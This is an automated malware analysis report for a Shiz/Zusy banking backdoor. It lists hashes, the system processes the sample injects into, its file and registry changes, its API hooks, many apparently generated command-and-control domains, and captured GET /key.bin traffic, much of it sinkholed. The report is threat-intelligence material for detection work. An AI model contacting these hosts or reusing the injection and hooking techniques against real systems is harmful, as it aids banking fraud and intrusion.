Gen.Variant.Zusy.Elzob.8654_bcf3331a73

by malwarelabrobot on November 2nd, 2017 in Malware Descriptions.

HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Variant.Zusy.Elzob.8654 (B) (Emsisoft), Gen:Variant.Zusy.Elzob.8654 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: bcf3331a7355038fb176d96dc6553ee4
SHA1: adc0defbfda118893eccfda0f4a53c5482eee3a6
SHA256: c072505ce98217f83b5b79bd12c4dcda660fe4aef31fc12e7ef06914b659faa4
SSDeep: 6144:eu kBmWicfSPyXTnkl r MHLt8TaggWQI9T1S0osk:eAmWip2TnGC MHL2mgiIF1S0
Size: 366080 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-10-01 20:32:05
Analyzed on: Windows7 SP1 32-bit

Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2512

The Trojan injects its code into the following process(es):

winlogon.exe:416
svchost.exe:580
svchost.exe:648
svchost.exe:700
svchost.exe:824
svchost.exe:864
taskhost.exe:872
svchost.exe:1048
svchost.exe:1156
svchost.exe:1280
Dwm.exe:1376
Explorer.EXE:1440
svchost.exe:1732
TPAutoConnect.exe:2160
conhost.exe:2168
svchost.exe:2560
conhost.exe:3956

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes)
C:\Windows\System32\config\SOFTWARE (13651 bytes)
C:\Windows (4 bytes)
C:\Windows\AppPatch\xodaql.exe (2837 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\584E.tmp (0 bytes)

Registry activity

The process %original file name%.exe:2512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"10f5f7ed" = "YM3&}=Ã¢â‚¬â€ZÃƒÂ®ÃƒÅ¡Ã‚Â¹Ã‚ÂÃ‚ÂªÃƒÂ¡Z dnÃƒâ€œj?Ã¢â‚¬â€[ÃƒÂ¼ÃƒÂ¾{ÃƒÂ²:Ãƒâ€™ÃƒÂ£Ã‚Â¬Ã¢â‚¬Å“Ã…Â¡Ã‚Â²Ã‚Â©#ÃƒÂº;Ã‚Â³Ã‚Â³Ãƒâ€˜Ã…Â¡qr{Ã‚Â¬Ã‚Â´3A#jÃ†â€™2r Ãƒâ„¢9Ãƒâ€šÃ‚Â².Ã‚Â²ÃƒÆ’tÃ¢â‚¬Å¡Ã‚Â¾sÃƒÂºÃ…Â¾Ãƒâ€š2Ã‚Â¡DÃ¢â‚¬â„¢*Ã…â€™Ãƒâ€ºDÃƒÂ¶Ã‚Â¶Ã‚Â¬Ã†â€™j~Ã…Â¾2Ã¢â‚¬ÂºÃ‚Â©Ã‚ÂÃ…Â¡Ã¢â‚¬â„¢ Ã¢â‚¬â„¢ÃƒÂ®#nNÃ‚Â¬dLRÃƒâ€ºÃ‚Â«jÃ‚Â¢avÃƒÅ“d~Ã¢â‚¬ÂºÃ…Â CÃƒÂ²6Ãƒâ€šÃƒâ€¹Ã¢â‚¬Â¹SÃ‚Â±ÃƒÂ£RÃ‚Â«9Ã‚Â±iÃƒÂ¹,Ã‚Â©Ãƒâ€“Ã…Â Ãƒâ€°Ã…Â ÃƒÂVÃ¢â‚¬Å¡BÃ¢â‚¬Å¡Ã…Â½Ã…Â¾Ã‚Â¹ÃƒÂªÃƒÅ ~ÃƒÅ |[ÃƒÂ«Ã‚ÂºÃ¢â‚¬ÂºACÃ¢â‚¬Â¹ÃƒÂ¹ÃƒÂ©ÃƒÂ¬>aÃƒâ€ ÃƒÂ¢Ã¢â‚¬ËœÃ‚Â¤Ãƒâ„¢{Ã‚Â²ÃƒÂ¢Ã†â€™i Ã¢â€žÂ¢Ãƒâ€™RKfÃ¢â‚¬Â¹Ã‚Â¾ÃƒÂ»ÃƒÅ’ÃƒÂºBÃ¢â€žÂ¢Ã…Â Ã¢â‚¬Å¡cNÃ‚Â¾;Ã†â€™ÃƒÂ¼ÃƒÂÃƒâ€˜DZÃ‚Â©4Fd1Ã¢â‚¬Å“[Ã…â€™Ãƒâ€¹ÃƒÅ Ã‚Â±ÃƒÂ¹Ã‚Â«i AÃ¢â‚¬â„¢ÃƒÂ£Ã†â€™jÃƒâ€¹ Ã¢â‚¬Â°Ã¢â‚¬Â ÃƒÂ¼Ãƒâ€œÃƒÂ¡sÃƒÂ±Q."

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ose00000.exe, , \??\C:\Windows\apppatch\xodaql.exe_, \??\C:\Windows\apppatch\xodaql.exe"

Dropped PE files

MD5	File path
05a61fd86e6c6be4ba25eb7bc7711e22	c:\Windows\AppPatch\xodaql.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
GetMessageW
TranslateMessage
GetMessageA
SetThreadDesktop

The Trojan installs the following user-mode hooks in ntdll.dll:

ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	10772	11264	4.1629	fc0cd423f3f881a1185bb93dc30c0ae4
.rdata	16384	6854	7168	4.09717	526aed65adee6062a4e8fcd112ec97d5
.data	24576	358948	344064	4.69085	3a9bf21e68fab6de8397ac481ecc0134
.reloc	385024	2426	2560	2.26235	d1f6091abe33d1cf8411d933a5d13ecc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 3
b592848c6a8ae7b2fdca9bae1953384c
b9c91e6e540274fb4c32e2359947f11a
b39ea4f79232adb9949bb61cee025813

URLs

URL	IP
hxxp://dixoxywy.info/key.bin	23.253.126.58
hxxp://jevijexi.info/key.bin	198.54.117.212
hxxp://wycokolo.info/key.bin	141.8.224.93
hxxp://zyrivuro.info/key.bin	23.253.126.58
hxxp://qekenivo.info/key.bin	23.253.126.58
hxxp://naselyfu.info/key.bin	23.253.126.58
hxxp://rydofale.info/key.bin	23.253.126.58
hxxp://rycikoga.info/key.bin	23.253.126.58
hxxp://xuxelixi.info/key.bin	23.253.126.58
hxxp://xudohijy.info/key.bin	23.253.126.58
hxxp://mavagyte.info/key.bin	23.253.126.58
hxxp://sivydubu.info/key.bin	23.253.126.58
hxxp://wekanila.info/key.bin	23.253.126.58
hxxp://zubisoda.info/key.bin	23.253.126.58
hxxp://nofipymo.info/key.bin	141.8.224.93
hxxp://mamawufo.info/key.bin	23.253.126.58
hxxp://rycukope.info/key.bin	23.253.126.58
hxxp://halybowu.info/key.bin	23.253.126.58
hxxp://xubusore.info/key.bin	141.8.224.93
hxxp://viwemata.info/key.bin	23.253.126.58
hxxp://fobefizi.info/key.bin	23.253.126.58
hxxp://kericura.info/key.bin	23.253.126.58
dns.msftncsi.com	131.107.255.255
www.microsoft.com	2.18.76.98
maraxiku.info
fogytibo.info
cinidofo.info
zybasixi.info
dokovoza.info
magisumi.info
jejemyje.info
cilicaco.info
najubumi.info
golevobi.info
hacyhasa.info
navegyfa.info
sigutiwi.info
viluceka.info
fokyvowu.info
xuhyroru.info
lyzeluxi.info
kejimyni.info
gacehawy.info
gacohabu.info
cinydota.info
zuxiliry.info
sizaxyse.info
lyzulunu.info
wyticogu.info
rynopavu.info
bovagyte.info
bopaketo.info
tuwybegi.info
gaquqoso.info
fokuvosy.info
dimemiby.info
vipukeky.info
puzazypy.info
jenoryre.info
zugiwoje.info
rywibevy.info
ryhuqela.info
gatazabe.info
tyfegaqo.info
www.bing.com
bozuceko.info
hapyzasi.info
bofapyfu.info
galivoha.info
kyzilury.info
dimamizu.info
foqiqiso.info
cihurafy.info
pujowevo.info
disojusi.info
zysahijy.info
sizyxyzo.info
rydufagy.info
ryhaqeqi.info
lysegixe.info
sirabyso.info
rydygapu.info
jefaderi.info
lysygina.info
hadideze.info
kefidexa.info
wydafava.info
pujuwela.info
xuqenara.info
sirybyhi.info
purubyly.info
bopilece.info
viherami.info
lykomuru.info
halubose.info
rynupago.info
makanika.info
sisajuhu.info
pupejygu.info
nagesuke.info
ryhoqevo.info
puzozyqu.info
jecejery.info
namuwume.info
fogutiwi.info
galovozo.info
tunapaqe.info
wexakovi.info
viwunafi.info
tujeqepu.info
qedufogu.info
qekuniqu.info
hanireby.info
zusihidu.info
wetexive.info
jepazana.info
lyjemyje.info
dibofusa.info
puzuxyvi.info
tujaweqi.info
marexice.info
fohatiza.info
sizexyha.info
gaqoqohi.info
fotyzasi.info
volecety.info
hanurezu.info
makybico.info
ciqaname.info
navygyki.info
puwobeqa.info
bomawufo.info
goqaqozu.info
dogitisu.info
magasufy.info
doqoqihi.info
sividuwy.info
vicugyci.info
gatozazy.info
jenyreji.info
kemutyxu.info
tunopavy.info
wetaxoly.info
kymytyji.info
disijuwo.info
foqeqoby.info
sisyjuze.info
qexukope.info
lyrevuju.info
zubosojo.info
novugycu.info
maxajoci.info
jefodeno.info
wexykoqy.info
kyjymyxo.info
sivefuzi.info
divafuho.info
lykamydy.info
xuherono.info
bofopyti.info
xuqunado.info
mamewuki.info
xudyhino.info
fokivohe.info
zuxylinu.info
kemityny.info
cilacami.info
lyxaluja.info
webypapa.info
gadadewo.info
qeroxigi.info
ciqonacy.info
xubasoxu.info
xubesony.info
boziceci.info
vipikece.info
vocygyko.info
vihyratu.info
wybapaqy.info
nomowuta.info
tynypapa.info
fotilohu.info
tulyzylo.info
dobufuwe.info
lyryvuxy.info
qekinipy.info
cilecaty.info
xudehixe.info
bopolema.info
sisujuba.info
lyrovudi.info
nafusyca.info
nopuleky.info
kyrucune.info
vopekefu.info
najibutu.info
hadodeba.info
hafydehy.info
hapezawo.info
jejamydy.info
jefededu.info
lymetydo.info
tyhyqege.info
qeqywuvy.info
gotezawo.info
citokema.info
tuzezyga.info
digetize.info
jecojenu.info
mamiwuta.info
goxyhase.info
zyxolide.info
qexojolo.info
kewacudo.info
bowomacy.info
kefydeje.info
jeneryda.info
bovigymy.info
rynipali.info
foqyqowa.info
zusuhiri.info
makonife.info
qetyxiqa.info
digotihy.info
hacuhaho.info
qequwuqe.info
jejumyxa.info
maryxima.info
hacihazi.info
sigytibo.info
teredo.ipv6.microsoft.com
qexikoga.info
zuruvuna.info
dosujuba.info
tuwabepo.info
ciwinaku.info
fobyfiby.info
puvodupe.info
qetuxipo.info
ciharoca.info
cihiroke.info
vowamame.info
cibosoki.info
bofypyke.info
wedyfopi.info
xugurody.info
hatizahu.info
bozacemu.info
kejomyru.info
puwibyve.info
bocegyfa.info
vilycefe.info
gohopihe.info
wedefoqo.info
pupojypi.info
tywubelu.info
pupijuqo.info
cidihifu.info
namywucy.info
magosutu.info

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET CNC Zeus Tracker Reported CnC Server group 4

Traffic

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wycokolo.info


HTTP/1.1 200 OK

Date: Wed, 01 Nov 2017 17:35:03 GMT

Server: Apache

Set-Cookie: gvc=913vr2571033037526473; expires=Mon, 31-Oct-2022 17:35:03 GMT; Max-Age=157680000; path=/; domain=wycokolo.info; HttpOnly

Content-Length: 51

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>HTTP/1.1 200 OK..Date: Wed, 01 Nov 2017 17:35:0
3 GMT..Server: Apache..Set-Cookie: gvc=913vr2571033037526473; expires=
Mon, 31-Oct-2022 17:35:03 GMT; Max-Age=157680000; path=/; domain=wycok
olo.info; HttpOnly..Content-Length: 51..Content-Type: text/html; chars
et=UTF-8..<html><head></head><body><!-- vbe
 --></body></html>..

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: dixoxywy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:53 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xubusore.info


HTTP/1.1 200 OK

Date: Wed, 01 Nov 2017 17:35:25 GMT

Server: Apache

Set-Cookie: gvc=917vr2571033258622238; expires=Mon, 31-Oct-2022 17:35:25 GMT; Max-Age=157680000; path=/; domain=xubusore.info; HttpOnly

Content-Length: 51

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>HTTP/1.1 200 OK..Date: Wed, 01 Nov 2017 17:35:2
5 GMT..Server: Apache..Set-Cookie: gvc=917vr2571033258622238; expires=
Mon, 31-Oct-2022 17:35:25 GMT; Max-Age=157680000; path=/; domain=xubus
ore.info; HttpOnly..Content-Length: 51..Content-Type: text/html; chars
et=UTF-8..<html><head></head><body><!-- vbe
 --></body></html>..

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycukope.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zubisoda.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:27 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rydofale.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:02 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zubisoda.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:28 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mamawufo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:01 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halybowu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: qekenivo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: dixoxywy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:53 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rydofale.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:01 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wekanila.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:56 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: sivydubu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:29 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: naselyfu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:57 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobefizi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:53 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: viwemata.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:02 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: nofipymo.info


HTTP/1.1 200 OK

Date: Wed, 01 Nov 2017 17:35:27 GMT

Server: Apache

Set-Cookie: gvc=912vr2571033278324987; expires=Mon, 31-Oct-2022 17:35:27 GMT; Max-Age=157680000; path=/; domain=nofipymo.info; HttpOnly

Content-Length: 51

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>HTTP/1.1 200 OK..Date: Wed, 01 Nov 2017 17:35:2
7 GMT..Server: Apache..Set-Cookie: gvc=912vr2571033278324987; expires=
Mon, 31-Oct-2022 17:35:27 GMT; Max-Age=157680000; path=/; domain=nofip
ymo.info; HttpOnly..Content-Length: 51..Content-Type: text/html; chars
et=UTF-8..<html><head></head><body><!-- vbe
 --></body></html>..

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xudohijy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:56 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kericura.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: sivydubu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:28 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobefizi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:53 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxelixi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycikoga.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xudohijy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:56 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kericura.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:33 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halybowu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wekanila.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:56 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zyrivuro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mamawufo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:35:00 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mavagyte.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: qekenivo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxelixi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycukope.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:54 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zyrivuro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Wed, 01 Nov 2017 17:34:55 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

